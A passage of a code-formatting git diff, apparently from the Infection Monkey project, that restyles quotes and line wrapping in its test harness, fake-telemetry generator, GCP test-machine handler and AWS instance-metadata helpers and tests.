monkeys = self.get_monkeys_from_telems(telem_contents) for i in tqdm(range(self.multiplier), desc="Batch of fabricated telemetries", position=1): for monkey in monkeys: @@ -40,46 +44,61 @@ class SampleMultiplier: for monkey in monkeys: if monkey.on_island: continue - if (monkey.original_guid in telem['content'] or monkey.original_guid in telem['endpoint']) \ - and not monkey.on_island: - telem['content'] = telem['content'].replace(monkey.original_guid, monkey.fake_guid) - telem['endpoint'] = telem['endpoint'].replace(monkey.original_guid, monkey.fake_guid) + if ( + monkey.original_guid in telem["content"] + or monkey.original_guid in telem["endpoint"] + ) and not monkey.on_island: + telem["content"] = telem["content"].replace( + monkey.original_guid, monkey.fake_guid + ) + telem["endpoint"] = telem["endpoint"].replace( + monkey.original_guid, monkey.fake_guid + ) for i in range(len(monkey.original_ips)): - telem['content'] = telem['content'].replace(monkey.original_ips[i], monkey.fake_ips[i]) + telem["content"] = telem["content"].replace( + monkey.original_ips[i], monkey.fake_ips[i] + ) @staticmethod def offset_telem_times(iteration: int, telems: List[Dict]): for telem in telems: - telem['time']['$date'] += iteration * 1000 + telem["time"]["$date"] += iteration * 1000 def get_monkeys_from_telems(self, telems: List[Dict]): island_ips = SampleMultiplier.get_island_ips_from_telems(telems) monkeys = [] - for telem in [telem for telem in telems - if 'telem_category' in telem and telem['telem_category'] == 'system_info']: - if 'network_info' not in telem['data']: + for 
telem in [ + telem + for telem in telems + if "telem_category" in telem and telem["telem_category"] == "system_info" + ]: + if "network_info" not in telem["data"]: continue - guid = telem['monkey_guid'] + guid = telem["monkey_guid"] monkey_present = [monkey for monkey in monkeys if monkey.original_guid == guid] if not monkey_present: - ips = [net_info['addr'] for net_info in telem['data']['network_info']['networks']] + ips = [net_info["addr"] for net_info in telem["data"]["network_info"]["networks"]] if set(island_ips).intersection(ips): on_island = True else: on_island = False - monkeys.append(FakeMonkey(ips=ips, - guid=guid, - fake_ip_generator=self.fake_ip_generator, - on_island=on_island)) + monkeys.append( + FakeMonkey( + ips=ips, + guid=guid, + fake_ip_generator=self.fake_ip_generator, + on_island=on_island, + ) + ) return monkeys @staticmethod def get_island_ips_from_telems(telems: List[Dict]) -> List[str]: island_ips = [] for telem in telems: - if 'config' in telem: - island_ips = telem['config']['command_servers'] + if "config" in telem: + island_ips = telem["config"]["command_servers"] for i in range(len(island_ips)): island_ips[i] = island_ips[i].replace(":5000", "") return island_ips diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py index 02cf3a8eb..7a4f30cff 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py @@ -1,19 +1,21 @@ from unittest import TestCase -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \ - FakeIpGenerator +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import ( + FakeIpGenerator, +) class TestFakeIpGenerator(TestCase): - def test_fake_ip_generation(self): fake_ip_gen = FakeIpGenerator() self.assertListEqual([1, 1, 1, 1], fake_ip_gen.fake_ip_parts) for i in range(256): - fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']) - self.assertListEqual(['1.1.2.1'], fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1'])) + fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"]) + self.assertListEqual(["1.1.2.1"], fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"])) fake_ip_gen.fake_ip_parts = [256, 256, 255, 256] - self.assertListEqual(['256.256.255.256', '256.256.256.1'], - fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1', '1.1.1.2'])) + self.assertListEqual( + ["256.256.255.256", "256.256.256.1"], + fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1", "1.1.1.2"]), + ) fake_ip_gen.fake_ip_parts = [256, 256, 256, 256] - self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1'])) + self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"])) diff --git a/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test.py b/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test.py index 699876cce..b76c1b68d 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test.py @@ -8,7 +8,9 @@ from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceA from 
envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import ( + SampleFileParser, +) LOGGER = logging.getLogger(__name__) @@ -17,7 +19,6 @@ MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=60) class TelemetryPerformanceTest: - def __init__(self, island_client: MonkeyIslandClient, quick_performance_test: bool): self.island_client = island_client self.quick_performance_test = quick_performance_test @@ -27,29 +28,40 @@ class TelemetryPerformanceTest: try: all_telemetries = SampleFileParser.get_all_telemetries() except FileNotFoundError: - raise FileNotFoundError("Telemetries to send not found. " - "Refer to readme to figure out how to generate telemetries and where to put them.") + raise FileNotFoundError( + "Telemetries to send not found. " + "Refer to readme to figure out how to generate telemetries and where to put them." + ) LOGGER.info("Telemetries imported successfully.") - all_telemetries.sort(key=lambda telem: telem['time']['$date']) + all_telemetries.sort(key=lambda telem: telem["time"]["$date"]) telemetry_parse_times = {} - for telemetry in tqdm(all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"): + for telemetry in tqdm( + all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent" + ): telemetry_endpoint = TelemetryPerformanceTest.get_verbose_telemetry_endpoint(telemetry) telemetry_parse_times[telemetry_endpoint] = self.get_telemetry_time(telemetry) - test_config = PerformanceTestConfig(MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME) + test_config = PerformanceTestConfig( + MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME + ) PerformanceAnalyzer(test_config, telemetry_parse_times).analyze_test_results() if not self.quick_performance_test: self.island_client.reset_env() def get_telemetry_time(self, telemetry): - content = telemetry['content'] - url = telemetry['endpoint'] - method = SupportedRequestMethod.__getattr__(telemetry['method']) + content = telemetry["content"] + url = telemetry["endpoint"] + method = SupportedRequestMethod.__getattr__(telemetry["method"]) return self.island_client.requests.get_request_time(url=url, method=method, data=content) @staticmethod def get_verbose_telemetry_endpoint(telemetry): telem_category = "" - if "telem_category" in telemetry['content']: - telem_category = "_" + json.loads(telemetry['content'])['telem_category'] + "_" + telemetry['_id']['$oid'] - return telemetry['endpoint'] + telem_category + if "telem_category" in telemetry["content"]: + telem_category = ( + "_" + + json.loads(telemetry["content"])["telem_category"] + + "_" + + telemetry["_id"]["$oid"] + ) + return telemetry["endpoint"] + telem_category diff --git a/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test_workflow.py b/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test_workflow.py index 6d09752ca..b492bf9e6 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test_workflow.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test_workflow.py @@ -1,12 +1,17 @@ from 
envs.monkey_zoo.blackbox.tests.basic_test import BasicTest -from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest +from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import ( + EndpointPerformanceTest, +) from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import TelemetryPerformanceTest +from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import ( + TelemetryPerformanceTest, +) class TelemetryPerformanceTestWorkflow(BasicTest): - - def __init__(self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test): + def __init__( + self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test + ): self.name = name self.island_client = island_client self.performance_config = performance_config @@ -15,10 +20,14 @@ class TelemetryPerformanceTestWorkflow(BasicTest): def run(self): try: if not self.quick_performance_test: - telem_sending_test = TelemetryPerformanceTest(island_client=self.island_client, - quick_performance_test=self.quick_performance_test) + telem_sending_test = TelemetryPerformanceTest( + island_client=self.island_client, + quick_performance_test=self.quick_performance_test, + ) telem_sending_test.test_telemetry_performance() - performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client) + performance_test = EndpointPerformanceTest( + self.name, self.performance_config, self.island_client + ) assert performance_test.run() finally: if not self.quick_performance_test: diff --git a/envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py b/envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py index 927b5b6f3..00279ea8b 100644 --- a/envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py +++ b/envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py @@ -11,14 +11,21 @@ class GCPHandler(object): MACHINE_STARTING_COMMAND = "gcloud compute instances start %s --zone=%s" MACHINE_STOPPING_COMMAND = "gcloud compute instances stop %s --zone=%s" - def __init__(self, key_path="../gcp_keys/gcp_key.json", zone="europe-west3-a", project_id="guardicore-22050661"): + def __init__( + self, + key_path="../gcp_keys/gcp_key.json", + zone="europe-west3-a", + project_id="guardicore-22050661", + ): self.zone = zone try: # pass the key file to gcp subprocess.call(GCPHandler.get_auth_command(key_path), shell=True) # noqa: DUO116 LOGGER.info("GCP Handler passed key") # set project - subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True) # noqa: DUO116 + subprocess.call( + GCPHandler.get_set_project_command(project_id), shell=True + ) # noqa: DUO116 LOGGER.info("GCP Handler set project") LOGGER.info("GCP Handler initialized successfully") except Exception as e: @@ -32,14 +39,18 @@ class GCPHandler(object): """ LOGGER.info("Setting up all GCP machines...") try: - subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116 + subprocess.call( + (GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True + ) # noqa: DUO116 LOGGER.info("GCP machines successfully started.") except Exception as e: LOGGER.error("GCP Handler failed to start GCP machines: %s" % e) def stop_machines(self, machine_list): try: - subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116 + 
subprocess.call( + (GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True + ) # noqa: DUO116 LOGGER.info("GCP machines stopped successfully.") except Exception as e: LOGGER.error("GCP Handler failed to stop network machines: %s" % e) diff --git a/envs/os_compatibility/conftest.py b/envs/os_compatibility/conftest.py index 13aabf5b6..eb643c028 100644 --- a/envs/os_compatibility/conftest.py +++ b/envs/os_compatibility/conftest.py @@ -2,10 +2,14 @@ import pytest def pytest_addoption(parser): - parser.addoption("--island", action="store", default="", - help="Specify the Monkey Island address (host+port).") + parser.addoption( + "--island", + action="store", + default="", + help="Specify the Monkey Island address (host+port).", + ) -@pytest.fixture(scope='module') +@pytest.fixture(scope="module") def island(request): return request.config.getoption("--island") diff --git a/envs/os_compatibility/test_compatibility.py b/envs/os_compatibility/test_compatibility.py index 1cf5220bb..f43323e19 100644 --- a/envs/os_compatibility/test_compatibility.py +++ b/envs/os_compatibility/test_compatibility.py @@ -31,22 +31,21 @@ machine_list = { } -@pytest.fixture(scope='class') +@pytest.fixture(scope="class") def island_client(island): island_client_object = MonkeyIslandClient(island) yield island_client_object -@pytest.mark.usefixtures('island_client') +@pytest.mark.usefixtures("island_client") # noinspection PyUnresolvedReferences class TestOSCompatibility(object): - def test_os_compat(self, island_client): print() all_monkeys = island_client.get_all_monkeys_from_db() ips_that_communicated = [] for monkey in all_monkeys: - for ip in monkey['ip_addresses']: + for ip in monkey["ip_addresses"]: if ip in machine_list: ips_that_communicated.append(ip) break diff --git a/monkey/__init__.py b/monkey/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/__init__.py +++ b/monkey/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/common/__init__.py b/monkey/common/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/common/__init__.py +++ b/monkey/common/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/common/cloud/__init__.py b/monkey/common/cloud/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/common/cloud/__init__.py +++ b/monkey/common/cloud/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/common/cloud/aws/aws_instance.py b/monkey/common/cloud/aws/aws_instance.py index 75dee4ce9..5cdf3bdd3 100644 --- a/monkey/common/cloud/aws/aws_instance.py +++ b/monkey/common/cloud/aws/aws_instance.py @@ -6,11 +6,11 @@ import requests from common.cloud.environment_names import Environment from common.cloud.instance import CloudInstance -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254" -AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS) +AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS) ACCOUNT_ID_KEY = "accountId" logger = logging.getLogger(__name__) @@ -20,6 +20,7 @@ class AwsInstance(CloudInstance): """ Class which gives useful information about the current instance you're on. 
""" + def is_instance(self): return self.instance_id is not None @@ -32,25 +33,35 @@ class AwsInstance(CloudInstance): self.account_id = None try: - response = requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2) + response = requests.get( + AWS_LATEST_METADATA_URI_PREFIX + "meta-data/instance-id", timeout=2 + ) self.instance_id = response.text if response else None self.region = self._parse_region( - requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').text) + requests.get( + AWS_LATEST_METADATA_URI_PREFIX + "meta-data/placement/availability-zone" + ).text + ) except (requests.RequestException, IOError) as e: logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e)) try: self.account_id = self._extract_account_id( - requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).text) + requests.get( + AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2 + ).text + ) except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e: - logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e)) + logger.debug( + "Failed init of AwsInstance while getting dynamic instance data: {}".format(e) + ) @staticmethod def _parse_region(region_url_response): # For a list of regions, see: # https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html # This regex will find any AWS region format string in the response. - re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])' + re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])" finding = re.findall(re_phrase, region_url_response, re.IGNORECASE) if finding: return finding[0] diff --git a/monkey/common/cloud/aws/aws_service.py b/monkey/common/cloud/aws/aws_service.py index a42c2e1dd..0825811a9 100644 --- a/monkey/common/cloud/aws/aws_service.py +++ b/monkey/common/cloud/aws/aws_service.py @@ -6,24 +6,27 @@ from botocore.exceptions import ClientError from common.cloud.aws.aws_instance import AwsInstance -__author__ = ['itay.mizeretz', 'shay.nehmad'] +__author__ = ["itay.mizeretz", "shay.nehmad"] -INSTANCE_INFORMATION_LIST_KEY = 'InstanceInformationList' -INSTANCE_ID_KEY = 'InstanceId' -COMPUTER_NAME_KEY = 'ComputerName' -PLATFORM_TYPE_KEY = 'PlatformType' -IP_ADDRESS_KEY = 'IPAddress' +INSTANCE_INFORMATION_LIST_KEY = "InstanceInformationList" +INSTANCE_ID_KEY = "InstanceId" +COMPUTER_NAME_KEY = "ComputerName" +PLATFORM_TYPE_KEY = "PlatformType" +IP_ADDRESS_KEY = "IPAddress" logger = logging.getLogger(__name__) def filter_instance_data_from_aws_response(response): - return [{ - 'instance_id': x[INSTANCE_ID_KEY], - 'name': x[COMPUTER_NAME_KEY], - 'os': x[PLATFORM_TYPE_KEY].lower(), - 'ip_address': x[IP_ADDRESS_KEY] - } for x in response[INSTANCE_INFORMATION_LIST_KEY]] + return [ + { + "instance_id": x[INSTANCE_ID_KEY], + "name": x[COMPUTER_NAME_KEY], + "os": x[PLATFORM_TYPE_KEY].lower(), + "ip_address": x[IP_ADDRESS_KEY], + } + for x in response[INSTANCE_INFORMATION_LIST_KEY] + ] class AwsService(object): @@ -45,8 +48,8 @@ class AwsService(object): @staticmethod def get_client(client_type, region=None): return boto3.client( - client_type, - region_name=region if region is not None else AwsService.region) + client_type, region_name=region if region is not None else AwsService.region + ) @staticmethod def get_session(): @@ -54,12 +57,12 @@ class AwsService(object): @staticmethod def get_regions(): - return 
AwsService.get_session().get_available_regions('ssm') + return AwsService.get_session().get_available_regions("ssm") @staticmethod def test_client(): try: - AwsService.get_client('ssm').describe_instance_information() + AwsService.get_client("ssm").describe_instance_information() return True except ClientError: return False diff --git a/monkey/common/cloud/aws/test_aws_instance.py b/monkey/common/cloud/aws/test_aws_instance.py index 30f0c9d86..146326518 100644 --- a/monkey/common/cloud/aws/test_aws_instance.py +++ b/monkey/common/cloud/aws/test_aws_instance.py @@ -2,14 +2,13 @@ import pytest import requests import requests_mock -from common.cloud.aws.aws_instance import (AWS_LATEST_METADATA_URI_PREFIX, - AwsInstance) +from common.cloud.aws.aws_instance import AWS_LATEST_METADATA_URI_PREFIX, AwsInstance from common.cloud.environment_names import Environment -INSTANCE_ID_RESPONSE = 'i-1234567890abcdef0' +INSTANCE_ID_RESPONSE = "i-1234567890abcdef0" -AVAILABILITY_ZONE_RESPONSE = 'us-west-2b' +AVAILABILITY_ZONE_RESPONSE = "us-west-2b" # from https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """ @@ -33,34 +32,33 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """ """ -EXPECTED_INSTANCE_ID = 'i-1234567890abcdef0' +EXPECTED_INSTANCE_ID = "i-1234567890abcdef0" -EXPECTED_REGION = 'us-west-2' +EXPECTED_REGION = "us-west-2" -EXPECTED_ACCOUNT_ID = '123456789012' +EXPECTED_ACCOUNT_ID = "123456789012" -def get_test_aws_instance(text={'instance_id': None, - 'region': None, - 'account_id': None}, - exception={'instance_id': None, - 'region': None, - 'account_id': None}): +def get_test_aws_instance( + text={"instance_id": None, "region": None, "account_id": None}, + exception={"instance_id": None, "region": None, "account_id": None}, +): with requests_mock.Mocker() as m: # request made to get instance_id - url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id' - m.get(url, text=text['instance_id']) if text['instance_id'] else m.get( - url, exc=exception['instance_id']) + url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id" + m.get(url, text=text["instance_id"]) if text["instance_id"] else m.get( + url, exc=exception["instance_id"] + ) # request made to get region - url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone' - m.get(url, text=text['region']) if text['region'] else m.get( - url, exc=exception['region']) + url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone" + m.get(url, text=text["region"]) if text["region"] else m.get(url, exc=exception["region"]) # request made to get account_id - url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document' - m.get(url, text=text['account_id']) if text['account_id'] else m.get( - url, exc=exception['account_id']) + url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document" + m.get(url, text=text["account_id"]) if text["account_id"] else m.get( + url, exc=exception["account_id"] + ) test_aws_instance_object = AwsInstance() return test_aws_instance_object @@ -69,9 +67,13 @@ def get_test_aws_instance(text={'instance_id': None, # all good data @pytest.fixture def good_data_mock_instance(): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': AVAILABILITY_ZONE_RESPONSE, - 'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": AVAILABILITY_ZONE_RESPONSE, + "account_id": 
INSTANCE_IDENTITY_DOCUMENT_RESPONSE, + } + ) def test_is_instance_good_data(good_data_mock_instance): @@ -97,9 +99,13 @@ def test_get_account_id_good_data(good_data_mock_instance): # 'region' bad data @pytest.fixture def bad_region_data_mock_instance(): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': 'in-a-different-world', - 'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": "in-a-different-world", + "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE, + } + ) def test_is_instance_bad_region_data(bad_region_data_mock_instance): @@ -125,9 +131,13 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance): # 'account_id' bad data @pytest.fixture def bad_account_id_data_mock_instance(): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': AVAILABILITY_ZONE_RESPONSE, - 'account_id': 'who-am-i'}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": AVAILABILITY_ZONE_RESPONSE, + "account_id": "who-am-i", + } + ) def test_is_instance_bad_account_id_data(bad_account_id_data_mock_instance): @@ -153,35 +163,37 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan # 'instance_id' bad requests @pytest.fixture def bad_instance_id_request_mock_instance(instance_id_exception): - return get_test_aws_instance(text={'instance_id': None, - 'region': AVAILABILITY_ZONE_RESPONSE, - 'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE}, - exception={'instance_id': instance_id_exception, - 'region': None, - 'account_id': None}) + return get_test_aws_instance( + text={ + "instance_id": None, + "region": AVAILABILITY_ZONE_RESPONSE, + "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE, + }, + exception={"instance_id": instance_id_exception, "region": None, "account_id": None}, + ) -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_is_instance_bad_instance_id_request(bad_instance_id_request_mock_instance): assert bad_instance_id_request_mock_instance.is_instance() is False -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_get_cloud_provider_name_bad_instance_id_request(bad_instance_id_request_mock_instance): assert bad_instance_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_get_instance_id_bad_instance_id_request(bad_instance_id_request_mock_instance): assert bad_instance_id_request_mock_instance.get_instance_id() is None -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_get_region_bad_instance_id_request(bad_instance_id_request_mock_instance): assert bad_instance_id_request_mock_instance.get_region() is None -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_instance): 
assert bad_instance_id_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID @@ -189,35 +201,37 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins # 'region' bad requests @pytest.fixture def bad_region_request_mock_instance(region_exception): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': None, - 'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE}, - exception={'instance_id': None, - 'region': region_exception, - 'account_id': None}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": None, + "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE, + }, + exception={"instance_id": None, "region": region_exception, "account_id": None}, + ) -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_is_instance_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.is_instance() -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_get_cloud_provider_name_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.get_cloud_provider_name() == Environment.AWS -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_get_instance_id_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_get_region_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.get_region() is None -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_get_account_id_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID @@ -225,35 +239,37 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance): # 'account_id' bad requests @pytest.fixture def bad_account_id_request_mock_instance(account_id_exception): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': AVAILABILITY_ZONE_RESPONSE, - 'account_id': None}, - exception={'instance_id': None, - 'region': None, - 'account_id': account_id_exception}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": AVAILABILITY_ZONE_RESPONSE, + "account_id": None, + }, + exception={"instance_id": None, "region": None, "account_id": account_id_exception}, + ) -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def test_is_instance_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.is_instance() -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def 
test_get_cloud_provider_name_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def test_get_instance_id_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def test_get_region_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.get_region() == EXPECTED_REGION -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.get_account_id() is None @@ -263,15 +279,15 @@ def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_insta def not_found_request_mock_instance(): with requests_mock.Mocker() as m: # request made to get instance_id - url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id' + url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id" m.get(url, status_code=404) # request made to get region - url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone' + url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone" m.get(url) # request made to get account_id - url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document' + url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document" m.get(url) not_found_aws_instance_object = AwsInstance() diff --git a/monkey/common/cloud/aws/test_aws_service.py b/monkey/common/cloud/aws/test_aws_service.py index 9e3f342b2..8b17d707d 100644 --- a/monkey/common/cloud/aws/test_aws_service.py +++ b/monkey/common/cloud/aws/test_aws_service.py @@ -3,7 +3,7 @@ from unittest import TestCase from .aws_service import filter_instance_data_from_aws_response -__author__ = 'shay.nehmad' +__author__ = "shay.nehmad" class TestFilterInstanceDataFromAwsResponse(TestCase): @@ -49,10 +49,10 @@ class TestFilterInstanceDataFromAwsResponse(TestCase): } """ - self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), []) + self.assertEqual( + filter_instance_data_from_aws_response(json.loads(json_response_empty)), [] + ) self.assertEqual( filter_instance_data_from_aws_response(json.loads(json_response_full)), - [{'instance_id': 'string', - 'ip_address': 'string', - 'name': 'string', - 'os': 'string'}]) + [{"instance_id": 